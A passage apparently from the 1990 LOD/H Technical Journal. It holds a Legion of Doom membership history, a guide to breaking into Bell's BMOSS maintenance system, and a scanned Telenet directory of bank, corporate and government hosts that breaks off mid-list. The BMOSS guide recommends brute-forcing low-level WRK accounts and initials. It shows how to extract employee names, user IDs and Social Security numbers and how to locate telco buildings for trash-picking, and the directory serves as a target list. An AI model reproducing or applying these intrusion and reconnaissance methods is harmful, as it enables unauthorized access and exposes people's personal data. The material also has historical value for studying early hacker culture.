known enough, (ie: they weren't big names even though they knew more than the guys who supposedly were) I put up the Legion Of Doom! bulletin board and shortly thereafter started a phreak/hack group of the same name. This was about May of 84 from what my records show. I had been a member of KOS and LOD or a brief time and then KOS broke up. Although there were many users on the LOD bbs, VERY FEW WERE MEMBERS OF THE GROUP! This distinction seems to have been forgotten by many, since some who were on the BBS have claimed to have been in the group, which is not true. The name Legion Of Doom! obviously came from the cartoon series which pitted them against The Superfriends. I suppose other group names have come from stranger sources. My handle, Lex Luthor was taken from the movie Superman I. In the cartoon series, LOD is led by Lex Luthor and thus, the group name was rather fitting. Being young and naive, I thought having a handle of someone who claimed to have 'the greatest criminal mind on Earth' and leading a group of the world's most notorious criminals would be cool. That was about 7-8 years ago. Now however, I see that there is nothing cool or attractive about being a criminal (believe it, or not). The original group consisted of phreaks who I had thought were very good but were not considered 'famous' like those in KOS. Those original members later became some of the best known phreak personalities and contributed substantially to the knowledge of new and old phreaks alike. A list of members from the very beginning to the present follows. Through my records and from the best of my recollection I have approximated dates of entrance and exit and other information. Also, I believe I have a complete list however, there could be a mistake or two. Very few if any, handles from the past have been duplicated by 'impostors' whether knowingly or unknowingly. I look at this article as a historical document seeing how no other group has survived as long as LOD has. LOD originally consisted mainly of phreaks, but had split into two separate entities. LOD for telecommunications hobbyists, and LOH for hacking and security enthusiasts. Handle Entered Exit Location Reason for leaving ----------------------------------------------------------------------------- Lex Luthor early 84 CURRENT Here/There ---CURRENT MEMBER--- Karl Marx early 84 late 85 Colorado Went underground/quit. Mark Tabas early 84 late 85 Colorado Many reasons. Agrajag The Prolonged early 84 late 85 California Loss of interest. King Blotto early 84 late 85 Ohio No time/college. Blue Archer early 84 Fall 87 Texas College. The Dragyn early 84 late 86 Minnesota No time/lost interest. Unknown Soldier mid 84 early 85 Florida Busted- Toll fraud. Sharp Razor late 84 early 86 New Jersey Busted- Abusing CIS. Doctor Who late 84 early 86 Mass. Misc. Trouble Lord Havok late 84 CURRENT Here/There ---CURRENT MEMBER--- Sir Francis Drake late 84 early 86 California ??? Paul Muad'dib late 84 early 86 New York Went underground/quit. Phucked Agent 04 late 84 late 87 California No time. School. X-man late 84 mid 85 New York Busted- Blue boxing. Randy Smith late 84 mid 85 Texas ??? Steve Dahl early 85 early 86 Illinois Busted-Carding. The Warlock early 85 early 86 Florida Lost interest. Terminal Man early 85 late 85 Mass. Kicked out-malicious hacking Silver Spy late 86 Fall 87 Mass. College. The Videosmith early 86 Fall 87 Penn. Lost interest. Kerrang Khan early 86 Fall 87 U.K. ??? The Marauder early 86 mid 88 Conn. Lost interest. Gary Seven early 86 mid 88 Florida Lost interest. Bill From RNOC early 87 late 87 New York Misc. Trouble. Carrier Culprit mid 87 mid 88 Penn. Lost interest. Master of Impact mid 87 mid 88 California School. The Leftist mid 87 Sum 89 Georgia Misc. Trouble. Phantom Phreaker mid 87 Fall 89 Here/There Lost interest. Doom Prophet mid 87 Fall 89 Here/There Lost interest. Thomas Covenant early 88 early 89 New York Misc. Trouble. The Mentor mid 88 Sum 89 Here/There Lost interest. The Urvile mid 88 Sum 89 Georgia Misc. Trouble. Phase Jitter mid 88 CURRENT Here/There ---CURRENT MEMBER--- Prime Suspect mid 88 CURRENT Here/There ---CURRENT MEMBER--- The Prophet late 88 Sum 89 Georgia Misc. Trouble. Skinny Puppy late 88 CURRENT Here/There ---CURRENT MEMBER---- Professor Falken late 89 CURRENT Here/There ---CURRENT MEMBER--- Directory key: "Lost Interest": simply means they lost interest in phreaking/hacking in general, not lost interest in LOD/H. "???": reason for leaving is unknown. Misc. Trouble: Exactly that. Too much to go into here. Of all 38 members, only one was forcefully ejected. It was found out that Terminal Man destroyed data that was not related to covering his tracks. This has always been unacceptable to us, regardless of what the media and law enforcement tries to get you to think. Remember, people's entrance/exit times have been estimated. [ End of Article ] The LOD/H Technical Journal, Issue #4: File 07 of 10 The Trasher's Handbook to B.M.O.S.S. by Spherical Aberration INTRODUCTION: Those who have actually trashed at Bell Co. before know that finding an installation can be a pain. Most Telco buildings these days are un-marked, plain, and generally overlooked by the average person. The buildings were specifically made so that they WOULD be overlooked, concealing itself and its contents. Knowing where all Bell Co. installations are would be nice, and through the help of BMOSS we can find out where they ALL are. NOTE: It is possible to get locations from your city hall, just take a look at what property Bell Co. owns and locate it. However, there are few catches to this method. First, most cities charge you to find out who owns what property and there might be a waiting period of a few days. Second, not all Bell Co. property is owned by Bell Co. There are instances of Bell Co. renting a piece of property from a company and using the existing building, possibly with the leasing companies logo still on it. BMOSS stands for Building Maintenance Operations Service System. BMOSS provides computer support for daily building maintenance tasks. A comprehensive database helps users keep track of repair activities. Telco field mechanics logon everyday to do assorted field mechanic stuff. From BMOSS they can check on tasks needed to be done, send messages to users, charge various Telco installations for work, log time sheets, generate purchase orders, see where his buddies are eating lunch etc. BMOSSes are usually located in a BOCC (Building Operations Control Center) or in a REOC (Real Estate Operations Center). BMOSS is run under AT&T Unix System V and at some points is quite Unix-like. At each center is one PDP-11/44 or a PDP-11/84 mainframe that is the base of operations for that center and other installations supported by that BOCC/REOC. LOGGING ONTO BMOSS: Before logging on to BMOSS you must select the proper type of terminal emulation. BMOSS has 4 types of emulations available for all users. Users within the BOCC/REOC use either VT100 or VT220 compatible terminals, while other internal stations will use an LA120 printer terminal. Field Mechanics at a remote location use their typewriter like LA12 printer terminals. Identifying a BMOSS dialup is not that hard at all. After hitting a three [CR]'s the system will respond with something like this: (BEEP!) Good Morning (Depending on what time of day it is) BASE/OE - Fri 04/23/90 09:43:22 - Online 9 User ID? Password? Typically user IDs are the three initials of the field mechanics name. After inputting your ID you will be prompted with a Password? request. Passwords can be from 6 to 8 characters in length, including punctuation marks, the first letter must begin with an alphabet-letter or a number. They cannot contain spaces or the users first/middle/last name. Periodically the system will prompt the user for a new password. This period of time is usually set by the system administrator. I have found that the "WRK:A10" user ID or a variation of WRK:xxx where xxx is a alpha-numerical combination has worked excellent for me. I believe the WRK:xxx is some type of low-level account when field mechanics lose their current ID/PW combination. Initials also have been found on most of the systems, so a WRK:xxx and Initials brute-force attempt just may give you a working ID. IN BMOSS: Once penetrating initial security you are then prompted with BMOSS's FLD> main level identifier. This FLD> changes as you move from BMOSS's root to the various main BMOSS branches. Sometimes when you logon to BMOSS you will receive a memo saying, "NOTE - Check your office" at this time go to the Office and read the memos sent to you. Read THE OFFICE later in this article to learn how. BMOSS was designed with the average Joe in mind and is very logically laid out. BMOSS was modeled after UNIX's Tree-oriented structure. Here is a Tree of BMOSS's structure: BMOSS _____________|_____________ | | | | | | CON DAT ACT FOR BIL OFF Main Branches: CON- Control Functions (Sys Admin payroll/timesheet functions) DAT- Database Maintenance (What we are mainly concerned with) ACT- Field Activity (Handles field activities) FOR- Force Administration (Recording labor hrs for time sheets etc.) BIL- Bill Paying (Processing purchase orders, producing expense accts.) OFF- Electronic Office (Receive/Send Messages or Page users) Each main branch then branches off into its own specific commands. I will concentrate on the Database Maintenance functions since the other functions have little or no use to us. DATABASE MAINTENANCE: To haul in the mother lode you go into the Database Maintenance area from the root. This is accomplished by typing DAT in at the FLD> prompt. Now you should get a DAT> prompt meaning you are now in the Database Maintenance section. To get a listing of the available DAT commands type in 'SHO' which is short for SHOW. We are mainly concerned with the BLD (Building Master) function. Once the BLD function is selected you will be prompted for a sub-form. There are 7 sub-forms for the BLD function. BLD Sub-Forms: 1. GEN- General Background 2. OWN- Building Ownership (used for adding a new building to database) 3. LES- Lease Terms (used for adding a new building to database) 4. EMG- Emergency Data (contains Police and Fire Dept. that serve this location and their respective telephone numbers, and whether the location has backup power and fire-sprinklers etc.) 5. RES- Maintenance Responsibility (Maintenance entries for building) 6. WRD- Building Warden (Building Wardens number etc.) 7. NOT- General Notes (Notes about the particular building) 8. ACC- Accounting Distribution (Account for particular building) Accessing the above information is as easy as selection of the three letter identifier at the Sub-Form prompt. We are particularly concerned with the GEN (General Background) information. This function gives us the following data: 1. Building's Number 2. Building's Complete Address 3. Building's Name 4. Building's Sector (Bell informational purposes only) 5. Building's Zone (Bell informational purposes only) 6. Whether or not Bell owns the building. (A Y/N combination is usually shown here. Y meaning its is owned by Bellco, N meaning its not owned by Bellco.) 7. The building's group (One letter identifier) 8. The building's use. (Garage/Warehouse/Office etc.) 9. The kind of telephone equipment used in the building. (ESS1A etc.) 10. Whether or not Bell is Sub-leasing parts of the building. (Y/N identifier) 11. The number of floors in the building 12. The number of basements in the building (A number of 3 here would mean the building has 3 below ground level floors. 13. Whether or not the building has a cable vault. (Y/N identifier) 14. Gross Square footage of the building 15. The number of reserved parking spaces for the building. Once entering the DAT section and entering GEN as your sub-form selection you will be prompted for a building number. Random selection of building numbers is necessary because they vary from area to area. Once a legitimate building number is accessed the above information will be displayed. Ok, you now have the information you need, how do you get back to a previous directory or even log off ? That's quite easy. Typing in EXI (short for EXIT) will bring you back up to the root FLD> one directory at a time. For logging off the system you should hit EXI until you reach the FLD> root then BYE and you will get: BASE/OE - Fri 4/23/90 10:22:13 - Offline 9 Have a Good Morning OTHER FUNCTIONS: I have found the REPORTS function most helpful in finding other user IDs. To get a listing of the 20+ different types reports type 'HELP REPORT' at the FLD> prompt. We are particularly concerned with REPORT 41, the Estimated vs. Actual Hours Log. We bring this up by typing from the FLD: FLD> REPORT 41 04/02/90-04/06/90 You are inquiring for the estimated vs. actual hours time on a series of jobs from April 4th 1990 through April 6th 1990. The output then kicks out the hours and such. Every field mechanic that worked throughout those days will be displayed in- First name, Middle Initial, and Last Name totally spelled out for you. Another useful report is REPORT 90- Data Access Log. It is called up by typing: FLD> REPORT 90 Date Range? 04/06/90-04/08/90 The system then kicks out all users that used the SCOPE command on other users. The system prints out the users full name and actual USER ID and who the user scoped including the scoped-user's Social Security number. THE OFFICE: When you are prompted that you should check your messages you should do so immediately before any work is done in BMOSS. First you must go to your office which is done by selecting OFF from the FLD> identifier. Once this is done your FLD> prompt will change to a OFF> prompt. Typing HELP will give you the available HELP commands for the office. To check the messages type in: OFF> STATUS BMOSS will reply with the following: (example) Memo From User Subject Status -------------- ------------------ ---------------------- --- IPAAA 04/01/90 Wile E Coyote Current Task Info OUT BNAAA 04/02/90 Susie B Hott Last Saturday Night IN The user then sees he has a memo from his boss about his current tasks and a memo from his co-worker/seductress Susie B. Hott. Fuck his boss, he wants to read what Susie has to say. So you type in: OFF> PRINT BNAAA --- MEMO --- Date: 04/02/90 Time: 08:11 From: Susie B Hott To: Legion Of Doom Subject: Last Saturday Night LOD, I really enjoyed last saturday night. We must do it again. Give me a call soon, 555-WETT. ** Susie A useful command is a list of OFFICE users. This gives you another listing of user's Full-Name/ID combinations. Get this by typing: OFF> USERS It will then print out the users who are in the Electronic Office database. CONCLUSION: You can get HELP from anywhere just by typing HELP from the prompt. Or if you need specific information about a function type in HELP then the function name. Such as: FLD> HELP REPORT (This gives you options/help on the REPORT command) BMOSS can be used for a large amount of purposes for the hacker/trasher. Even though it doesn't have any really powerful commands to self-destruct the telephone company it can be used to access other building's trash, and other things that may interest you. ______________________ ( Spherical Aberration ) The LOD/H Technical Journal, Issue #4: File #08 of 10 The Legion Of Hackers Present: Updated: Telenet Directory Part A: Addresses 201XXX to 424XXX Revision #5 Last Updated: 2/10/90 (Includes Mnemonic Host Names) Scanned and Written by: Erik Bloodaxe INTRODUCTION: ------------- It has been some time since our last update. Our old list (Revision #4) has been distributed to those in the United States and internationally thanks to the widespread use of the PSS network. For this reason we are including the format for converting this 'local' address list into accessible hosts using the standard scheme for telenet when accessed from 'foreign' networks. For example, the local address: 20114 is 031102010001400 using the standard format. 3110 is the DNIC (Data Network Identifier Code) for USS Telenet and the zero preceding it is needed to make it clear to the foreign network that the NUA (Network User Address) is a non-local address. Another example, the local address is 203155 would be: 031102030015500 thus: 0DNIC NPA 00 XXX YY NPA is the area-code prefix (this is not necessarily an area code), XXX is the sub-address and YY is the port which is usually 00. For those unfamiliar with Telenet addressing, it generally follows the format of grouping hosts into area codes. Thus, our directory is grouped accordingly. There are 'non-standard' address prefixes which are rather obscure. These commonly are owned by the same company or organization, whereas the area code format contains hosts from many companies or organizations. The state an area code resides is also listed to give you an idea of its location. I have also included Telenet commands, mnemonic addresses, a somewhat current list of pc-pursuit dialers, and a few things to consider for the would-be Telenet scanner. NOTES: When accessing telenet from abroad, ignore the '$' after the address. This denotes to users of the USA that an NUI (Network User ID) is required due to the host not accepting collect charges for the connection. Addresses preceded by a * refuse collect connections, but I was unable to connect with them to determine what they were. Addresses that have no comments next to them either hang up upon connection, or I was unable to evoke any response from them. Due to its immense size, this directory has been presented in a 'rougher' form than our previous ones. The time to make it look 'pretty' was determined to not be worth the effort. TELENET COMMANDS ---------------- Most commands are listed in their four character form, however, some may be abbreviated to merely one character (ie. C & D). CONN Allows user to connect to a specified host DISA ECHO DISA FLOW DISA TFLO DISC Disconnect from current host DTAPE ? ENAB ECHO ENAB FLOW ENAB TFLO FULL Full duplex HANG Hang up port HALF Half duplex MAIL Telemail service PAR Set parameters as specified PAR? Shows current parameter settings RESE Resets the node to inactive RST Sets parameters of remote host as specified RST? Shows current parameters of remote host SET Same as PAR SET? Same as PAR? STAT Shows current port TAPE ? TELE Telemail service TEST CHAR Test of all ascii characters TEST ECHO Test which echos all characters typed TEST TRIA Test which makes repeating triangle TEST VERS Shows current pad software version The default command is CONN, so if an address is entered at the '@' prompt, an attempt will be made to connect to that address. A connection attempt may be aborted by sending a break signal. This will put you back to the '@' prompt. To return to the '@' prompt from an established connection the user must type '@' followed by carriage return. Normal 300/1200 users awaken the pad with two carriage returns. 2400 baud users must type '@' then carriage return. To awaken the pad in the Uninet format, type: carriage return, period, then carriage return (upon initial connection). To find the telenet dialup nearest your location, call 800-424- 9494 at 300/1200 baud. At the '@' prompt, type 'MAIL'. Enter user name 'PHONES' with password 'PHONES'. TELENET DIRECTORY ----------------- 201--NEW JERSEY--ADDRESSES SCANNED: 0-2000 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 1 PC Pursuit Dialer (1200) 14 WELCOME, NAME OR #? 15 " " $ 20 VM/370 $ 22 PC Pursuit Dialer (2400) * 23 25 WELCOME, NAME OR #? 32 D&B $ 34 PRIME MWH $ 35 PRIME 45 NEWSNET $ 49 VAX 50 UNIX Interet $ 51 PRIME USCGB 53 Colgates IICS $ 55 PRIME USCGB $ 66 PRIME SYS001 67 Warner Computer Systems 68 " " 69 " " 74 enter class 83 ENTER ID: 84 D&B 86 D&B 88 D&B 89 VM/370 $ 129a 138 HP-3000 * 140 146 HP-3000 149 VAX * 150 156 UNIX Securities Data Company 159a 163 VU/TEXT 164 VU/TEXT 166 VM/370 New Jersey Educational Net 171 >> 172 >> 173 200 D&B 201 D&B 220 VAX Investment Technologies 225 VAX " " $ 241 242 D&B 243 D&B 244 D&B 246 D&B 249 password required * 251 252 PRIME 259 VAX CCMI/McGraw Hill * 260 $ 301 PC Pursuit Dialer (1200) 334 TINTON1 * 336 $ 350 Concurrent Computer Corp 353 enter switch characters $ 355 Concurrent Computer Corp 359 Telenet Async to 3270 367 * 371 * 379 453 Telenet Async to 3270 454a Telenet Async to 3270 $ 458 ENTER REQUEST $ 459 " 461 VAX 463a Telenet Async to 3270 470 Decserver $ 472 MHP201A 476 X.29 Password: 477 Please enter logon cmd $ 478 MHP205A 479 Please enter logon cmd 520 Enter Access ID: 521 Bankers Trust Online 522 VAX NYBTRP * 548 586 Dow Jones News Retrieval 587 " " 589 " " 604 Lipton Network 700 HP-3000 702 TOPS-20 CEI 722 INSCI/90 730 " 751 " 752 " 770 " 792 " 799 830 INSCI/90 841 " 850 870 INSCI/90 890 " 895 " 899 910 INSCI/90 912 " 914 " 916 918 INSCI/90 940 " 950 Bankers Trust Online 951 " " 952 " " 953 " " 954 " " 955 " " 956 " " 957 " " 958 " " 959 " " 999 1025 1051 VU/TEXT 1052 " 1053 " 1054 " 1055 " 1056 " 1057 " 1058 " 1059 " 1060 " 1061 " 1062 " 1063 " 1064 " 1065 " 1066 " 1067 " 1068 " 1069 " 1075 " 1076 " 1077 " 1078 " 1079 " 202--WASHINGTON D.C.--ADRESSES SCANNED: 0-800 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 10 PRIME 31 VAX News Machine $ 36 Network Sign-on Failed $ 38 " $ 47 VAX * 48 49 ENTER SYSTEM ID-- $ 115 PC Pursuit Dialer (300) $ 116 PC Pursuit Dialer (1200) $ 117 PC Pursuit Dialer (2400) * 123 132 VAX 133 BA 134 BA $ 138 VAX Gallaudet University $ 139 DEC-10 141 PRIME Telemail 142 PRIME Telemail $ 149 150 VAX IDR * 151 $ 154 Telenet Async to 3270 $ 155a Telenet Async to 3270 $ 156 VAX American Psychiatric Assn * 157 161 UNIX pac 162 enter user id- $ 165 HP-3000 $ 166 VAX 201 Host Name: 202 203 USER ID: 214 PRIME SPA 217 * 224 * 230 232a $ 235 PRIME AMSC $ 239 PRIME AMSA * 241 * 242 * 243 245 AOS * 253 * 254 255 Morgan Stanley Network * 258 * 260 * 265 * 266 * 275 * 276 * 277 $ 278 USER ID 308 PRIME 309 PRIME 312 PRIME * 330 * 331 * 332 * 333 * 334 * 335 336 VAX Congressional Quarterly 337 VAX " $ 343 PRIME OT 360 HP-3000 361 362 * 364 365 LEXIS/NEXIS 366 " 367 " * 371 * 372 * 373 * 377 $ 390 #Connect Requested $ 391 " * 403 430 > * 433 * 434 439 Institute of Nuclear Power 440 " 441 " 442 you are now connected 444 Institute of Nuclear Power $ 455 456 457 458 $ 462 $ 463 465 466 467 469 470 472 $ 473 $ 474 $ 475 $ 532 VAX $ 535 AOS * 536 * 652 * 653 * 654 693 HP-3000 MPE XL 709 710 711 712 810 Telenet Async to 3270 811a Telenet Async to 3270 1180 INVALID-SW-CHARACTERS 1181 1182 NCR Comten 203--CONNECTICUT--ADDRESSES SCANNED: 0-600 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 22 VM/370 * 57 $ 60 HP-3000 66 Login Please: 72 HP-3000 73a Password: 75 VAX $ 105 PC Pursuit Dialer (2400) $ 120 PC Pursuit Dialer (300) $ 121 PC Pursuit Dialer (1200) $ 132 VAX * 135 136 PRIME SYSA $ 140 ID 165 Telekurs USA * 230 * 231 304 HP-3000 $ 305 Name? 307 HP-3000 310 * 311 * 331 * 332 * 501 602 DESTINATION? 205--ALABAMA--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- * 30 $ 33 ID * 34 * 36 $ 73 PRIME ALABMA * 137 $ 145 HP-3000 206--WASHINGTON--ADDRESSES SCANNED: 0-1000 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 20 HP-3000 $ 30 HP-3000 32 VAX $ 35 DMOLNCT $ 38 AOS $ 40 PRIME P6350 $ 42 AOS $ 44 AOS $ 50 AOS 53 $ 57 AOS 65 PRIME OAD $ 131 AOS $ 132 VAX ETA-RX $ 135 AOS 137a Boeing msg switch $ 138 USSMSG2 $ 139 WANG VS SECURITIES (FRS) $ 141 AOS $ 145 AOS $ 146 PRIME SEATLE $ 147 AOS * 150 $ 160 AOS $ 161 AOS 175a Boeing test $ 205 PC Pursuit Dialer (300) $ 206 PC Pursuit Dialer (1200) 207a $ 208 PC Pursuit Dialer (2400) $ 250 WANG VS SYSTEM ONE (FRC) $ 251 WANG VS SYSTEM TWO (TACOMA) $ 338 $ 357 HP-3000 $ 430 Environmental Ctrl Monitor 439 bcs network 440 NOS Boeing 447 NOS Boeing 448 bcs network 449 VM/370 207--MAINE--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- * 51 208--IDAHO--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 42 AOS $ 43 AOS $ 56 AOS $ 131 AOS $ 134 AOS $ 135 AOS $ 136 AOS $ 137 AOS $ 140 AOS $ 141 AOS * 150 $ 152 AOS 209--CALIFORNIA--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 30 AOS $ 31 AOS * 33 * 34 211--DUN & BRADSTREET--ADDRESSES SCANNED: 0-100/1000-2000 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 1140 1142 1145 Dun & Bradstreet Terminal 1190 " " 1195 " " 1240 " " 1244 " " 1290 " " 1291 " " 1295 " " 1390 " " 1391 " " 1392 PRIME 1396 Dun & Bradstreet Terminal 1490 PRIME 1491 Dun & Bradstreet Terminal 1492 " " 1493 " " 1494 " " 1540 " " 1591 " " 1594 " " 1594 " " 1640 " " 1690 " " 1693 " " 2140 CCS Online 2141 CCS Online 2142 VM/370 2143 sls1 2145 VM/370 2150 PRIME 2151 fsd2 2152 socy 2153 css3 2154 CCS Online 2155 CCS Online 2156 ecl1 2157 tbs1 2158 dbc1 2159 exx2 2160 nyt2 2162 css1 2163 css2 2164 bofa 2165 soc1 2166 soc2 2167 socx 2168 soc3 2169 soca 2170 socb 2171 socc 2172 dnb1 2173 mdy2 2174 koln 2175 fsd1 2176 ptts 2177 has1 2178 has3 2179 levi 2180 nyt1 2181 pers 2182 risk 2183 usc1 2184 cids 2185 zyt1 2186 inel 2187 fop1 2188 kbm1 2189 kbm2 2190 kbm3 2191 kbm4 2192 sls1 2193 mdy1 2194 ira1 2195 ira2 2196 why1 2197 ndg1 2198 lit1 2450 PRIME 3141 IDC/370 6140 OAG 212--NYC-BRONX & MANHATTAN--ADDRESSES SCANNED: 0-1200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 11 PLEASE BEGIN $ 28 PC Pursuit Dialer (2400) 31 VM/370 * 34 39 PRIME IDDD 40 PLEASE ENTER /LOGIN * 48 $ 52 PRIME SYSA $ 73 USS00 74 VM/370 79 ENTER ID: * 85 * 86 $ 99 HP-3000 105 ****INVALID SIGNON 106 " 108 " 109 " 110 " 112 VM/370 $ 124 VAX 131 VM/370 * 132 * 135 137 PRIME NY60 141 PRIME Telemail 142 PRIME " 145 ENTER ACCESS ID: 146 " * 149 152 VAX $ 154 PRIME NYORK * 157 * 158 * 160 $ 167 PRIME MPISBS 170 Information Services Net 172 " $ 173 Brown Brothers 174 Information Services Net * 197 200 ENTER IDENTIFICATION: 216 Bank of New York 226 USER ID 231 VM/370 $ 235 PRIME JAMACA 237 TIMEINC NYK 238 246 VAX UniTraC 248 PRIME RYE * 249 * 255 * 256 $ 257 BANAMEX Data Network 258 ENTER ACCESS ID: $ 259 VAX BTNET 260 Bankers Trust Online 263 VAX 266 UNIX 267 UNIX $ 271 : * 273 $ 274 INVALID INPUT 275 Bankers Trust Online * 278 * 279 * 306 $ 315 PC Pursuit Dialer (1200) 320 ENTER IDENTIFICATION 321 " $ 322 COMMAND UNRECOGNIZED * 326 328 ENTER IDENTIFICATION * 336 345 PRIME NMSG $ 350 VTAM002 $ 351 " * 352 * 354 359 376 Bankers Trust Online 377 " 378 " 379 " * 432 433 VAX 443 VAX 444 PRIME EMCO $ 446 VAX 449 VM/370 446 468 479 Invalid Login Attempt * 496 * 497 500 enter a for astra 501 " 502 " 503 " 504 " 505 " 506 " 507 " 535 TIMEINC NYK 536 " 537 " 539 VOS $ 540 VAX Client Videotext Server $ 541 VAX " 544 TIMEINC NYK 545 " $ 546 APLICACO: $ 548 PRIME TREPP1 552 TIMEINC NYK 553 " 554 " 566 " 567 " * 576 577 Telenet Async to 3270 579a Telenet Async to 3270 580 615 Shearson Lehman Hutton 631 649 WANG VS 693 702 713 PRIME NY60 $ 726 VAX $ 737 FINLAY FINE JEWELRY $ 752 " $ 753 " 755 VM/370 * 768 935 * 970 * 971 * 972 * 973 * 974 * 975 * 976 * 977 * 978 * 979 981 UNIX * 1009 * 1031 1034 1036 1039 * 1040 $ 1045 HP-3000 1049 MHP201A 1052 PRIME FTC0 1069 VAX $ 1071 GS/1 $ 1072 GS/1 * 1074 * 1075 213--CALIFORNIA--ADDRESSES SCANNED: 0-1200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 21 PRIME C6 22 PRIME D6 * 23 24 Marketron Research 25 33 35 Marketron Research 40 PRIME A6 * 41 44 * 45 51 $ 52 PRIME AIS8 * 54 * 57 58 PRIME ACSI 79 UNIX Interactive Systems 88 PRIME MSCOST $ 92a 102 PRIME TRWE.A $ 103 PC Pursuit Dialer (1200) 105 PRIME SWOP $ 113 118 VAX 121 PRIME SWWE1 122 PRIME TRNGW2 123 PRIME SWWA1 124 PRIME CS.CAR 125 PRIME SWLAR 126 HP-3000 128 PRIME CS.SD $ 143 HP-3000 ANA Trading Corporation * 144 151 PRIME CSSWR1 153 PRIME SWLA1 154 PRIME SWWCR 155 PRIME CS.LA $ 166 BW/IP International Inc. * 169 172a $ 176 AOS * 178 199 PRIME C6 219 220 Telenet Async to 3270 221a Telenet Async to 3270 227a * 249 * 250 * 252 * 255 * 256 * 257 260 Telenet Async to 3270 261a Telenet Async to 3270 * 336 $ 338 HP-3000 340 PRIME TRNGW 342 PRIME SWLB1 347 * 361 $ 369 PRIME LA * 371 374 Telenet Async to 3270 375a Telenet Async to 3270 $ 412 PC Pursuit Dialer (1200) $ 413 PC Pursuit Dialer (2400) * 464 485a 488a * 1041 * 1043 1403 COMPUTAX 1404 COMPUTAX 214--TEXAS--ADDRESSES SCANNED: 0-1200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 17 Teleview 20 US Sprint 21 Teleview * 22 42 DNA Online * 48 * 53 60 HP-3000 $ 62 PRIME TRUSWL * 65 71 PRIME UCCC 76 CYBER PCC 77 PRIME UCCC 94a $ 117 PC Pursuit Dialer (300) $ 118 PC Pursuit Dialer (1200) 120 131 HP-3000 152 HP-3000 156 HP-3000 * 157 159a C@ 160a C@ 168 HP-3000 169 HP-3000 176a PRIME UCCC 177 HL053-TRAN 231 233 236a 240 VAX HQAAFES 242 TACL 1> * 250 * 252 * 253 * 254 * 255 * 256 * 257 * 258 * 259 * 261 * 262 * 263 * 264 * 265 * 266 * 267 * 268 * 269 * 270 * 279 341 PRIME BNW 342 PRIME GCAD.. * 373 * 530 * 531 * 532 * 533 * 534 * 535 * 536 * 537 * 538 * 539 607 HP-3000 215--PENNSYLVANIA--ADDRESSES SCANNED: 0-400 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 5 PC Pursuit Dialer (300) $ 22 PC Pursuit Dialer (2400) * 30 $ 32 AOS $ 35 IMS AMERICA 40 VU/TEXT $ 45 IMS AMERICA 49 Telebase Systems * 50 * 54 * 60 66 Newsnet 74 92a $ 112 PC Pursuit Dialer (1200) 121 Towers Perrin Online * 132 135 VU/TEXT 136 DSS::15B1 137 140 VU/TEXT $ 148 Weston's Computer Center $ 156 Telenet Async to 3270 $ 157a Telener Async to 3270 $ 234 235 HP-3000 262 Data Mail 264 ? 265 " 266 " 267 " 268 " 269 PRIME * 350 * 360 $ 361 HP-3000 216--OHIO--ADDRESSES SCANNED: 0-400 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 20 PC Pursuit Dialer (300) $ 21 PC Pursuit Dialer (1200) $ 30 MRI CICS H0C3 * 31 $ 32 MRI CICS H0C3 $ 34 PRIME SH.US $ 35 * 51 * 55 * 57 * 59 $ 60 MHP201A 66 Newsnet $ 74 HP-3000 109a * 115 $ 120 PC Pursuit Dialer (2400) * 125 * 134 * 135 * 138 $ 144 U#= 163 * 178 217--ILLINIOS--ADDRESSES SCANNED: 0-300 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 25 UNIX University of Illinois 26 UNIX University of Illinois $ 35 VAX NCSA VMSA $ 39 ID $ 40 $ 41 PRIME SPRFLD 218--MINNESOTA--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 30 AOS $ 38 AOS $ 39 AOS * 40 $ 42 AOS $ 45 AOS $ 56 AOS $ 142 AOS $ 157 AOS 219--INDIANA--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 4 PRIME NODE.1 5 PRIME NODE.2 6 PRIME NODE.4 7 PRIME NODE.5 8 PRIME NODE.8 9 N1127p3 ENTER GROUP NAME> 10 Lincoln National Corp. * 50 222--UNKNOWN--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 100 PRIME 301a C@ 401a C@ 223--CITIBANK--ADDRESSES SCANNED: 0-300/1000-3000 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- * 1 $ 2 VAX CRIS 10 PRIME * 15 19 HP-3000 26 GS/1 IBISM Electronic Village 30 VAX Citi Treasury Products 31 INVALID FORMAT 32 enter a for astra * 34 35 VAX Citi Treasury Products 39 HRINFO NETWORK 40 VAX Global Report 46 CICS PPD Communications Network 47 CICS PPD Connunications Network 48 Citibank NY port CBN2 49 Online Manual 50 PRIME 55 PRIME WINMIS 61 VAX Global Report 63 VAX Global Report 65 System/88 $ 68 Citimail II 70 VAX FIG ADMIN CLUSTER 71 Enter Translator Number 91 VAX $ 92 Citinet $ 94 $ 95 <> $ 96 <> 97 Quotdial 98 VAX CMA1 $ 100 